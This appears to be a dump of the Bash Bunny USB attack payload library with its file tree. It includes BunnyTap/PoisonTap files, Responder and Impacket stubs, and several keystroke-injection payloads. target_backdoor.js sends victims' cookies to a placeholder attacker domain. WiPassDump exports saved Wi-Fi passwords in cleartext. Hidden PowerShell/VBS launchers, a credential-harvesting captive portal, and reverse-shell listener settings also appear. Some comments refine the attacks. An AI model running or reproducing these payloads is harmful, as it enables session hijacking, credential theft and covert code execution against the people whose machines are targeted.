├── .gitignore ├── payloads ├── library │ ├── RAZ_VBScript │ │ ├── listener_port.txt │ │ ├── listener_ip.txt │ │ └── payload.txt │ ├── RAZ_ReverseShell │ │ ├── listener_port.txt │ │ ├── listener_ip.txt │ │ └── payload.txt │ ├── tools_installer │ │ ├── tools_to_install │ │ │ ├── responder │ │ │ │ ├── logs │ │ │ │ │ └── .gitignore │ │ │ │ ├── poisoners │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── MDNS.py │ │ │ │ │ └── NBTNS.py │ │ │ │ ├── servers │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── POP3.py │ │ │ │ │ ├── IMAP.py │ │ │ │ │ ├── FTP.py │ │ │ │ │ ├── SMTP.py │ │ │ │ │ └── DNS.py │ │ │ │ ├── tools │ │ │ │ │ ├── MultiRelay │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ ├── creddump │ │ │ │ │ │ │ ├── README │ │ │ │ │ │ │ ├── framework │ │ │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ │ │ ├── win32 │ │ │ │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ │ │ │ └── rawreg.py │ │ │ │ │ │ │ │ └── types.py │ │ │ │ │ │ │ ├── CHANGELOG │ │ │ │ │ │ │ ├── pwdump.py │ │ │ │ │ │ │ ├── cachedump.py │ │ │ │ │ │ │ └── lsadump.py │ │ │ │ │ │ └── relay-dumps │ │ │ │ │ │ │ └── .gitignore │ │ │ │ │ ├── SMBFinger │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ └── odict.py │ │ │ │ │ ├── FindSQLSrv.py │ │ │ │ │ ├── DHCP_Auto.sh │ │ │ │ │ └── FindSMB2UPTime.py │ │ │ │ ├── .gitignore │ │ │ │ ├── files │ │ │ │ │ ├── BindShell.exe │ │ │ │ │ └── AccessDenied.html │ │ │ │ ├── certs │ │ │ │ │ ├── gen-self-signed-cert.sh │ │ │ │ │ ├── responder.crt │ │ │ │ │ └── responder.key │ │ │ │ ├── DumpHash.py │ │ │ │ ├── fingerprint.py │ │ │ │ └── Responder.conf │ │ │ └── impacket │ │ │ │ ├── impacket │ │ │ │ ├── krb5 │ │ │ │ │ └── __init__.py │ │ │ │ ├── ldap │ │ │ │ │ └── __init__.py │ │ │ │ ├── dcerpc │ │ │ │ │ ├── __init__.py │ │ │ │ │ └── v5 │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ └── dcom │ │ │ │ │ │ └── __init__.py │ │ │ │ ├── examples │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── ntlmrelayx │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ ├── utils │ │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ │ ├── tcpshell.py │ │ │ │ │ │ │ └── config.py │ │ │ │ │ │ ├── 
servers │ │ │ │ │ │ │ └── __init__.py │ │ │ │ │ │ └── clients │ │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ │ ├── imaprelayclient.py │ │ │ │ │ │ │ └── httprelayclient.py │ │ │ │ │ └── logger.py │ │ │ │ ├── testcases │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── SMB_RPC │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ ├── dcetests.cfg │ │ │ │ │ │ ├── rundce.sh │ │ │ │ │ │ └── test_nmb.py │ │ │ │ │ ├── ImpactPacket │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ ├── runalltestcases.bat │ │ │ │ │ │ ├── runalltestcases.sh │ │ │ │ │ │ ├── test_TCP_bug_issue7.py │ │ │ │ │ │ └── test_IP6.py │ │ │ │ │ └── dot11 │ │ │ │ │ │ ├── runalltestcases.bat │ │ │ │ │ │ ├── runalltestcases.sh │ │ │ │ │ │ ├── test_wps.py │ │ │ │ │ │ ├── test_helper.py │ │ │ │ │ │ ├── test_FrameControlACK.py │ │ │ │ │ │ ├── test_FrameControlCTS.py │ │ │ │ │ │ ├── test_FrameControlRTS.py │ │ │ │ │ │ ├── test_FrameControlCFEnd.py │ │ │ │ │ │ ├── test_FrameControlPSPoll.py │ │ │ │ │ │ ├── test_FrameControlCFEndCFACK.py │ │ │ │ │ │ ├── test_Dot11Decoder.py │ │ │ │ │ │ └── test_RadioTapDecoder.py │ │ │ │ ├── version.py │ │ │ │ ├── __init__.py │ │ │ │ ├── Dot11Crypto.py │ │ │ │ ├── eap.py │ │ │ │ ├── Dot11KeyManager.py │ │ │ │ └── uuid.py │ │ │ │ ├── MANIFEST.in │ │ │ │ ├── .gitignore │ │ │ │ ├── examples │ │ │ │ ├── uncrc32.py │ │ │ │ ├── mssqlinstance.py │ │ │ │ ├── opdump.py │ │ │ │ ├── loopchain.py │ │ │ │ ├── sniffer.py │ │ │ │ ├── ping6.py │ │ │ │ ├── smbserver.py │ │ │ │ ├── ping.py │ │ │ │ └── mqtt_check.py │ │ │ │ ├── setup.py │ │ │ │ └── README.md │ │ ├── payload.txt │ │ ├── readme.txt │ │ └── install.sh │ ├── BunnyTap │ │ ├── js │ │ │ ├── ajax.googleapis.com__ajax__libs__webfont__2016.__webfont.js │ │ │ ├── ajax.googleapis.com__ajax__libs__jquery__2.1.2__jquery.min.js │ │ │ ├── ajax.googleapis.com__ajax__libs__mootools__1.1.1__mootools.min.js │ │ │ ├── ajax.googleapis.com__ajax__libs__mootools__1.1.2__mootools.min.js │ │ │ ├── ajax.googleapis.com__ajax__libs__mootools__1.2.1__mootools.min.js │ │ │ ├── 
ajax.googleapis.com__ajax__libs__mootools__1.2.2__mootools.min.js │ │ │ ├── ajax.googleapis.com__ajax__libs__mootools__1.2.3__mootools.min.js │ │ │ ├── ajax.googleapis.com__ajax__libs__mootools__1.2.4__mootools.min.js │ │ │ ├── ajax.googleapis.com__ajax__libs__mootools__1.2.5__mootools.min.js │ │ │ ├── ajax.googleapis.com__ajax__libs__mootools__1.3.0__mootools.min.js │ │ │ ├── ajax.googleapis.com__ajax__libs__mootools__1.3.1__mootools.min.js │ │ │ ├── ajax.googleapis.com__ajax__libs__mootools__1.3.2__mootools.min.js │ │ │ ├── ajax.googleapis.com__ajax__libs__mootools__1.4.0__mootools.min.js │ │ │ ├── ajax.googleapis.com__ajax__libs__mootools__1.4.1__mootools.min.js │ │ │ ├── ajax.googleapis.com__ajax__libs__mootools__1.4.2__mootools.min.js │ │ │ ├── ajax.googleapis.com__ajax__libs__mootools__1.4.3__mootools.min.js │ │ │ ├── ajax.googleapis.com__ajax__libs__mootools__1.4.4__mootools.min.js │ │ │ ├── ajax.googleapis.com__ajax__libs__mootools__1.4.5__mootools.min.js │ │ │ ├── ajax.googleapis.com__ajax__libs__mootools__1.5.0__mootools.min.js │ │ │ ├── ajax.googleapis.com__ajax__libs__mootools__1.5.1__mootools.min.js │ │ │ ├── ajax.googleapis.com__ajax__libs__angularjs__1.4.0-beta6__angular.min.js │ │ │ ├── ajax.googleapis.com__ajax__libs__scriptaculous__1.8.1__scriptaculous.js │ │ │ ├── ajax.googleapis.com__ajax__libs__scriptaculous__1.8.2__scriptaculous.js │ │ │ ├── ajax.googleapis.com__ajax__libs__scriptaculous__1.9.0__scriptaculous.js │ │ │ └── ajax.googleapis.com__ajax__libs__scriptaculous__1.8.3__scriptaculous.js │ │ ├── alexa1m.sh │ │ ├── target_backdoor.js │ │ ├── install.sh │ │ ├── payload.txt │ │ ├── README.md │ │ └── backend_server.js │ ├── ExecutableInstaller │ │ ├── i.vbs │ │ ├── d.cmd │ │ ├── payload.txt │ │ ├── readme.md │ │ └── e.cmd │ ├── usb_exfiltrator │ │ ├── i.vbs │ │ ├── d.cmd │ │ ├── payload.txt │ │ ├── readme.md │ │ └── e.cmd │ ├── Captiveportal │ │ ├── captiveportal │ │ ├── portal.html │ │ ├── README.md │ │ └── payload.txt │ ├── DuckyInstall │ │ 
├── payload.txt │ │ ├── DuckToolkit-1.0.1.tar.gz │ │ ├── readme.txt │ │ └── install.sh │ ├── WiPassDump │ │ ├── a.cmd │ │ ├── readme.md │ │ └── payload.txt │ ├── payloads.txt │ ├── DuckyTemplate │ │ ├── ducky_script.txt │ │ ├── payload.txt │ │ └── readme.md │ ├── 90sMode │ │ ├── payload.txt │ │ └── readme.md │ ├── SmacAndGrab │ │ ├── readme.md │ │ └── payload.txt │ ├── macinfograbber │ │ ├── readme.md │ │ └── payload.txt │ ├── rdp_checker │ │ ├── install.sh │ │ ├── readme.md │ │ └── payload.txt │ ├── MacReverseShell │ │ ├── readme.md │ │ └── payload.txt │ ├── nmapper │ │ ├── readme.md │ │ └── payload.txt │ ├── QuickCreds │ │ ├── readme.md │ │ └── payload.txt │ ├── GitBunnyGit │ │ ├── README.md │ │ └── payload.txt │ └── bunny_helpers.sh ├── switch2 │ └── payload.txt └── switch1 │ └── payload.txt └── README.md /.gitignore: -------------------------------------------------------------------------------- 1 | .DS_Store 2 | -------------------------------------------------------------------------------- /payloads/library/RAZ_VBScript/listener_port.txt: -------------------------------------------------------------------------------- 1 | 4444 -------------------------------------------------------------------------------- /payloads/library/RAZ_ReverseShell/listener_port.txt: -------------------------------------------------------------------------------- 1 | 4444 -------------------------------------------------------------------------------- /payloads/library/RAZ_VBScript/listener_ip.txt: -------------------------------------------------------------------------------- 1 | 192.168.1.100 -------------------------------------------------------------------------------- /payloads/library/RAZ_ReverseShell/listener_ip.txt: -------------------------------------------------------------------------------- 1 | 192.168.1.100 -------------------------------------------------------------------------------- /payloads/switch2/payload.txt: 
-------------------------------------------------------------------------------- 1 | LED R B 2 | ATTACKMODE RNDIS_ETHERNET 3 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/logs/.gitignore: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /payloads/switch1/payload.txt: -------------------------------------------------------------------------------- 1 | LED R B 2 | ATTACKMODE ECM_ETHERNET STORAGE 3 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/poisoners/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/servers/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/tools/MultiRelay/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/tools/SMBFinger/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/js/ajax.googleapis.com__ajax__libs__webfont__2016.__webfont.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- 
/payloads/library/tools_installer/tools_to_install/impacket/impacket/krb5/__init__.py: -------------------------------------------------------------------------------- 1 | pass 2 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/ldap/__init__.py: -------------------------------------------------------------------------------- 1 | pass 2 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/tools/MultiRelay/creddump/README: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/js/ajax.googleapis.com__ajax__libs__jquery__2.1.2__jquery.min.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/dcerpc/__init__.py: -------------------------------------------------------------------------------- 1 | pass 2 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/dcerpc/v5/__init__.py: -------------------------------------------------------------------------------- 1 | pass 2 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/examples/__init__.py: -------------------------------------------------------------------------------- 1 | pass 2 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/testcases/__init__.py: 
-------------------------------------------------------------------------------- 1 | pass 2 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/js/ajax.googleapis.com__ajax__libs__mootools__1.1.1__mootools.min.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/js/ajax.googleapis.com__ajax__libs__mootools__1.1.2__mootools.min.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/js/ajax.googleapis.com__ajax__libs__mootools__1.2.1__mootools.min.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/js/ajax.googleapis.com__ajax__libs__mootools__1.2.2__mootools.min.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/js/ajax.googleapis.com__ajax__libs__mootools__1.2.3__mootools.min.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/js/ajax.googleapis.com__ajax__libs__mootools__1.2.4__mootools.min.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/js/ajax.googleapis.com__ajax__libs__mootools__1.2.5__mootools.min.js: -------------------------------------------------------------------------------- 1 | 2 | 
-------------------------------------------------------------------------------- /payloads/library/BunnyTap/js/ajax.googleapis.com__ajax__libs__mootools__1.3.0__mootools.min.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/js/ajax.googleapis.com__ajax__libs__mootools__1.3.1__mootools.min.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/js/ajax.googleapis.com__ajax__libs__mootools__1.3.2__mootools.min.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/js/ajax.googleapis.com__ajax__libs__mootools__1.4.0__mootools.min.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/js/ajax.googleapis.com__ajax__libs__mootools__1.4.1__mootools.min.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/js/ajax.googleapis.com__ajax__libs__mootools__1.4.2__mootools.min.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/js/ajax.googleapis.com__ajax__libs__mootools__1.4.3__mootools.min.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- 
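/payloads/library/BunnyTap/js/ajax.googleapis.com__ajax__libs__mootools__1.4.4__mootools.min.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/js/ajax.googleapis.com__ajax__libs__mootools__1.4.5__mootools.min.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/js/ajax.googleapis.com__ajax__libs__mootools__1.5.0__mootools.min.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/js/ajax.googleapis.com__ajax__libs__mootools__1.5.1__mootools.min.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/dcerpc/v5/dcom/__init__.py: -------------------------------------------------------------------------------- 1 | pass 2 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/tools/MultiRelay/relay-dumps/.gitignore: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/alexa1m.sh: --------------------------------------------------------------------------------
#!/bin/sh
# Fetch the Alexa top-1M site list used by the BunnyTap (PoisonTap) payload.
#
# - https rather than http: the list is pulled over whatever network the
#   Bunny is on and there is no published checksum to verify it against
#   afterwards, so TLS is the only integrity protection available.
# - set -e: a failed download aborts the script instead of silently
#   leaving no file behind.
set -e
wget https://s3.amazonaws.com/alexa-static/top-1m.csv.zip
-------------------------------------------------------------------------------- /payloads/library/BunnyTap/js/ajax.googleapis.com__ajax__libs__angularjs__1.4.0-beta6__angular.min.js: 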
-------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/examples/ntlmrelayx/__init__.py: -------------------------------------------------------------------------------- 1 | pass 2 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/testcases/SMB_RPC/__init__.py: -------------------------------------------------------------------------------- 1 | pass 2 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/tools/MultiRelay/creddump/framework/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/testcases/ImpactPacket/__init__.py: -------------------------------------------------------------------------------- 1 | pass 2 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/tools/MultiRelay/creddump/framework/win32/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/examples/ntlmrelayx/utils/__init__.py: -------------------------------------------------------------------------------- 1 | pass 2 | -------------------------------------------------------------------------------- /payloads/library/ExecutableInstaller/i.vbs: -------------------------------------------------------------------------------- 1 | 
CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False -------------------------------------------------------------------------------- /payloads/library/usb_exfiltrator/i.vbs: -------------------------------------------------------------------------------- 1 | CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False 2 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/.gitignore: -------------------------------------------------------------------------------- 1 | # Responder logs 2 | *.db 3 | *.txt 4 | *.log 5 | 6 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/testcases/dot11/runalltestcases.bat: -------------------------------------------------------------------------------- 1 | 2 | FOR /f "tokens=*" %%G IN ('dir /B *.py') DO %%G -------------------------------------------------------------------------------- /payloads/library/Captiveportal/captiveportal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chrismaddalena/bashbunny-payloads/master/payloads/library/Captiveportal/captiveportal -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/testcases/ImpactPacket/runalltestcases.bat: -------------------------------------------------------------------------------- 1 | 2 | FOR /f "tokens=*" %%G IN ('dir /B *.py') DO %%G -------------------------------------------------------------------------------- /payloads/library/DuckyInstall/payload.txt: -------------------------------------------------------------------------------- 1 | # Install payload for the DuckToolkit 2 | # See install.sh and readme.txt for details 3 | ATTACKMODE ECM_ETHERNET STORAGE 4 | 
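-------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/MANIFEST.in: -------------------------------------------------------------------------------- 1 | include MANIFEST.in 2 | include LICENSE 3 | include ChangeLog 4 | recursive-include examples *.txt *.py 5 | -------------------------------------------------------------------------------- /payloads/library/DuckyInstall/DuckToolkit-1.0.1.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chrismaddalena/bashbunny-payloads/master/payloads/library/DuckyInstall/DuckToolkit-1.0.1.tar.gz -------------------------------------------------------------------------------- /payloads/library/WiPassDump/a.cmd: --------------------------------------------------------------------------------
REM Go to the loot directory: two levels above the switch folder this
REM script lives in, on the Bash Bunny USB disk. Create it if it is not
REM there yet. Without this check a failed "cd" would leave us in the
REM payload folder and netsh would write the profile XML files -- which
REM carry the Wi-Fi passphrases in cleartext -- there instead of in loot.
cd /d "%~dp0"
if not exist "..\..\loot\WiPassDump\" mkdir "..\..\loot\WiPassDump"
cd /d "..\..\loot\WiPassDump\" || exit /b 1

REM Export every saved Wi-Fi profile, with its key in cleartext, as XML
REM into the current (loot) directory.
netsh wlan export profile key=clear
-------------------------------------------------------------------------------- /payloads/library/payloads.txt: -------------------------------------------------------------------------------- 1 | Update this library with the latest payload set from the Bash Bunny community and learn more about creating and publishing your own payloads at https://www.bashbunny.com 2 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/examples/ntlmrelayx/servers/__init__.py: -------------------------------------------------------------------------------- 1 | from httprelayserver import HTTPRelayServer 2 | from smbrelayserver import SMBRelayServer 3 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/payload.txt: -------------------------------------------------------------------------------- 1 | 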
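# All of the heavy lifting of this payload occurs in install.sh 2 | # which gets renamed to install.sh.INSTALLED once completed. 3 | ATTACKMODE SERIAL STORAGE 4 | -------------------------------------------------------------------------------- /payloads/library/DuckyTemplate/ducky_script.txt: -------------------------------------------------------------------------------- 1 | DELAY 2000 2 | GUI r 3 | DELAY 1000 4 | STRING notepad.exe 5 | DELAY 100 6 | ENTER 7 | DELAY 3000 8 | STRING https://bunnytoolkit.com running Ducky Script on a Bash Bunny 9 | Enter -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/files/BindShell.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chrismaddalena/bashbunny-payloads/master/payloads/library/tools_installer/tools_to_install/responder/files/BindShell.exe -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/certs/gen-self-signed-cert.sh: --------------------------------------------------------------------------------
#!/bin/bash
# Generate the self-signed key/cert pair used by Responder's HTTPS server.
#
# Run this on each Bash Bunny before first use: the responder.key and
# responder.crt committed next to this script are identical in every
# checkout of the repository, so anyone holding that key can impersonate
# a listener that still presents it.
set -e
# Create the private key owner-readable only. openssl honours the process
# umask, so under the usual 022 the key would be world-readable.
(umask 077 && openssl genrsa -out responder.key 2048)
# Empty subject on purpose: the certificate only has to exist for the TLS
# handshake; no client is expected to trust it.
openssl req -new -x509 -days 3650 -key responder.key -out responder.crt -subj "/"
-------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/examples/ntlmrelayx/clients/__init__.py: -------------------------------------------------------------------------------- 1 | from mssqlrelayclient import MSSQLRelayClient 2 | from smbrelayclient import SMBRelayClient 3 | from ldaprelayclient import LDAPRelayClient 4 | from httprelayclient import HTTPRelayClient 5 | from imaprelayclient import IMAPRelayClient --------------------------------------------------------------------------------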
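/payloads/library/BunnyTap/target_backdoor.js: --------------------------------------------------------------------------------
/* This javascript is prepended and cached to many common JS files on the web such as Google's CDN files, found in the js/ directory next to this file (PoisonTap's poisontap/js/).
 * By default, it logs the domain's cookies. Change 'YOUR.DOMAIN' to your domain.
 *
 * Review notes:
 *  - The DOM property is document.cookie (singular). document.cookies does not
 *    exist, so the previous version only ever sent the literal string "undefined".
 *  - Only cookies without the HttpOnly flag are readable from script; HttpOnly
 *    session cookies will not show up in the log.
 *  - The cookie string is URL-encoded so ';', '=', '&' or '#' inside it cannot
 *    truncate or split the query string on the logging server.
 *  - Deliberately ES5 (no template literal / const): this snippet is prepended to
 *    very old libraries (MooTools 1.1, scriptaculous 1.8) and must parse in any
 *    browser that loads them.
 */
new Image().src = 'http://YOUR.DOMAIN/poisontap/log.php?log=' + encodeURIComponent(document.cookie);
-------------------------------------------------------------------------------- /payloads/library/usb_exfiltrator/d.cmd: -------------------------------------------------------------------------------- 1 | @echo off 2 | start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')" 3 | cscript %~dp0\i.vbs %~dp0\e.cmd 4 | @exit -------------------------------------------------------------------------------- /payloads/library/ExecutableInstaller/d.cmd: -------------------------------------------------------------------------------- 1 | @echo off 2 | start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')" 3 | cscript %~dp0\i.vbs %~dp0\e.cmd 4 | @exit -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/tools/MultiRelay/creddump/CHANGELOG: -------------------------------------------------------------------------------- 1 | Version: 0.3 Date: 8/1/2012 2 | 3 | * Fixed LM and NTLM Hash Corruption issue. Thanks to Jonathan Claudius. 4 | Closes Issue 3.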
5 | 6 | Version: 0.2 Date: 2/24/2011 7 | 8 | * Fixed issue with wrong format specifier being used (L instead of I), which 9 | caused creddump to fail on 64-bit systems. 10 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/testcases/SMB_RPC/dcetests.cfg: -------------------------------------------------------------------------------- 1 | [global] 2 | 3 | [TCPTransport] 4 | servername = 5 | machine = 172.16.123.232 6 | username = test 7 | password = test 8 | hashes = 9 | aesKey256 = 10 | aesKey128 = 11 | domain = 12 | [SMBTransport] 13 | servername = 14 | machine = 172.16.123.232 15 | username = test 16 | password = test 17 | hashes = 18 | aesKey256 = 19 | aesKey128 = 20 | domain = 21 | 22 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/version.py: -------------------------------------------------------------------------------- 1 | # Copyright (c) 2003-2016 CORE Security Technologies 2 | # 3 | # This software is provided under under a slightly modified version 4 | # of the Apache Software License. See the accompanying LICENSE file 5 | # for more information. 
6 | # 7 | 8 | VER_MAJOR = "0" 9 | VER_MINOR = "9.16-dev" 10 | 11 | BANNER = "Impacket v%s.%s - Copyright 2002-2016 Core Security Technologies\n" % (VER_MAJOR,VER_MINOR) 12 | 13 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Payload Library for the Bash Bunny by Hak5 2 | 3 | ![Bash Bunny](https://cdn.shopify.com/s/files/1/0068/2142/products/bashbunny_2a_large.png "Bash Bunny") 4 | 5 | * [Purchase at HakShop.com](https://hakshop.com/products/bash-bunny "Purchase at HakShop.com") 6 | * [Documentation and Wiki](http://wiki.bashbunny.com/#!index.md "Documentation and Wiki") 7 | * [Bash Bunny Forums](https://forums.hak5.org/index.php?/forum/92-bash-bunny/ "Bash Bunny Forums") 8 | * IRC: irc.hak5.org #BashBunny 9 | -------------------------------------------------------------------------------- /payloads/library/DuckyTemplate/payload.txt: -------------------------------------------------------------------------------- 1 | LED G 2 | ATTACKMODE HID STORAGE 3 | 4 | # Set your language here 5 | LANGUAGE='us' 6 | 7 | LED R G 8 | # Check for switch position to make it easier for us. 9 | source bunny_helpers.sh 10 | 11 | if [ -f "/root/udisk/payloads/${SWITCH_POSITION}/ducky_script.txt" ]; then 12 | QUACK ${SWITCH_POSITION}/ducky_script.txt 13 | LED G 14 | else 15 | LED R 16 | echo "Unable to load ducky_script.txt" >> /root/debuglog.txt 17 | exit 1 18 | fi 19 | -------------------------------------------------------------------------------- /payloads/library/Captiveportal/portal.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | Captive Portal 4 | 9 | 10 | 11 |

Captive Portal

12 |
13 | Username:
14 | Password:
15 | 16 |
17 | 18 | -------------------------------------------------------------------------------- /payloads/library/DuckyInstall/readme.txt: -------------------------------------------------------------------------------- 1 | DuckToolkit installer for Bash Bunny. 2 | Adds support for new languages. and uses the Ducktoolkit python library for encoding. 3 | 4 | Version 1.0.0 5 | 6 | Moves the libary files to /tools 7 | Update Q and QUACK to point to the new library 8 | Writes error to /root/ducky.log 9 | 10 | Purple Blinking.................Moving tools 11 | Purple Solid....................Tools moved 12 | Amber Blinking..................Setup tools 13 | Red Solid.......................Tool installation failed 14 | White Solid.....................Installation completed successfully 15 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/readme.txt: -------------------------------------------------------------------------------- 1 | Tools Installer for Bash Bunny 2 | Version 1.1.0 3 | 4 | Moves tools from the tools_to_install/ USB disk to /pentest on the Bash Bunny 5 | When installation succeeds, install.sh will be renamed to install.sh.INSTALLED 6 | 7 | A list of installed tools is created on the USB disk as installed-tools.txt 8 | 9 | Purple Blinking.................Moving tools 10 | Purple Solid....................Tools moved 11 | Amber Blinking..................Setup tools 12 | Red Solid.......................Tool installation failed 13 | White Solid.....................Installation completed successfully -------------------------------------------------------------------------------- /payloads/library/90sMode/payload.txt: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # Title: 90s Mode 4 | # Author: Hak5Darren 5 | # Version: 1.0 6 | # Category: Prank 7 | # Target: Windows XP SP3+ 8 | # 9 | # Turns back the clock to a k-rad ultra ereet 1990's VGA 
resolution 10 | # Executes p.ps1 from the selected switch folder of the Bash Bunny USB Disk partition, 11 | 12 | # Source bunny_helpers.sh to get environment variable SWITCH_POSITION 13 | source bunny_helpers.sh 14 | 15 | LED R B 16 | ATTACKMODE HID STORAGE 17 | QUACK GUI r 18 | QUACK DELAY 100 19 | QUACK STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\r.ps1')" 20 | QUACK ENTER 21 | LED G -------------------------------------------------------------------------------- /payloads/library/DuckyTemplate/readme.md: -------------------------------------------------------------------------------- 1 | # Ducky Script Template for Bash Bunnys 2 | 3 | Author: @kevthehermit 4 | Version: Version 1.0 5 | 6 | ## Description 7 | 8 | Boiler Plate for running ducky scripts on the Bash Bunny 9 | 10 | ## Configuration 11 | 12 | HID or HID STORAGE 13 | 14 | ## Requirements 15 | 16 | Install DuckToolkit payload for extra language support 17 | 18 | ## STATUS 19 | 20 | | LED | Status | 21 | | ---------------- | ------------------------------------- | 22 | | Red | Failed to open script file | 23 | | Amber | Script Running | 24 | | Green | Finished | 25 | 26 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/testcases/SMB_RPC/rundce.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 